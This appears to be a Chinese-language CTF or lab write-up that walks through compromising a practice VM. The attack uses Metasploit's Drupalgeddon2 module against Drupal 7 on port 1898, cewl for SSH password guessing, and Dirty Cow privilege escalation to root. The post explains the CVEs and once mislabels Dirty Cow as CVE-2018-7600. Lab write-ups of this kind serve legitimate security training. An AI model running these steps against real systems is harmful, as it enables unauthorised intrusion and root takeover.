WP2

首先,拿到靶机,确定网卡配置正确,随后用netdiscover配合MAC确认ip192.168.193.139

端口扫描

nmap -p- 192.168.193.139

结果发现:

22/tcp - SSH (OpenSSH)

80/tcp - HTTP

1898/tcp - cymtec-port (Drupal 7 Web 服务)

屏幕截图 2026-07-28 102134

发现HTTP是开着的,尝试打开网页

屏幕截图 2026-07-28 135448

成功进入,但JS没什么东西

屏幕截图 2026-07-28 135508

考虑到还扫出来一个1898的端口,可以尝试用dir扫一下1898和80,不过我这里直接尝试性质的打开1898的网站,发现网站也能进入屏幕截图 2026-07-28 102319

分析网站

屏幕截图 2026-07-28 102430屏幕截图 2026-07-28 102410

根据分析得到大概有两个用户tiago和eder

同时根据JS和信息收集可发现

屏幕截图 2026-07-28 135508

  1. 一个二维码一个音频一个视频

qrc

这三个都是彩蛋或没什么用的(就说个账户名)

2.这个系统是Drupal7,查询资料得知其漏洞

利用漏洞获取 Shell

使用 Metasploit:

msfconsole

use exploit/unix/webapp/drupal_drupalgeddon2

set RHOSTS 192.168.193.139

set RPORT 1898

set LHOST 192.168.193.128

Run

屏幕截图 2026-07-28 141854

进去之后信息搜集只找到一个用户tiago

尝试用ssh连接发现需要密码

这里我是试了好久一个个尝试最后发现是这家伙的姓氏

正常应该用这个生成爆破文档去ssh爆破

cewl http://192.168.193.139:1898/ -w key2.txt

屏幕截图 2026-07-28 142825

连接上去后发现只是一个普通用户,然后尝试升权

先看一下版本

uname -a

屏幕截图 2026-07-28 142825

然后查询发现有三种漏洞可以用

Drupal 7 漏洞利用阶段(端口 1898)

CVE-2018-7600(Drupalgeddon 2) 远程代码执行

原理:Drupal 7 的 Form API 在处理用户提交数据时,未能正确过滤 # 开头的特殊渲染数组。攻击者在表单字段中注入 #post_render 或 #lazy_builder 回调,指向 system 或 exec 函数,Drupal 渲染引擎在处理时会直接调用该回调,导致任意 PHP 代码执行

利用方式:使用 Metasploit 的 exploit/unix/webapp/drupal_drupalgeddon2 模块,通过 HTTP 请求向 /user/register 等公开表单提交恶意数据,触发后获得反弹 Shell

影响版本:Drupal 7.x 至 7.58

其他可能存在的 Drupal 漏洞(如 CVE-2014-3704 SQL注入、CVE-2019-6340 RESTful RCE),但在本次渗透中未发现或未使用

Linux 本地提权阶段(SSH 登录 tiago 后)

CVE-2016-5195(脏牛 Dirty Cow) 内核竞争条件提权

原理:Linux 内核的写时复制机制存在竞争条件,允许低权限用户向只读内存映射中写入数据。利用该漏洞可以直接修改 /etc/passwd 文件,在系统中添加一个 uid=0 的 root 用户,从而实现提权

利用方式:将 40847.cpp 上传至靶机的 /tmp 目录,使用 g++ 编译后运行,程序会自动向 /etc/passwd 写入新用户

影响版本:Linux 内核 2.6.22 至 4.8.3

漏洞稳定性:极高

CVE-2015-1328(Overlayfs 提权) 文件系统本地提权

原理:Ubuntu 内核中的 OverlayFS 文件系统实现存在缺陷,允许普通用户通过挂载操作获取 root 权限

影响版本:Ubuntu 12.04 至 15.04,内核 3.13.0-24 至 3.19.0-21

最后选择最方便的脏牛CVE-2018-7600

查询后发现kali里面自带

屏幕截图 2026-07-28 140817

屏幕截图 2026-07-28 140820

最终提权得到rootshell,找到flag

posted @ 2026-09-15 13:57  DRACU  阅读(3)  评论(0)    收藏  举报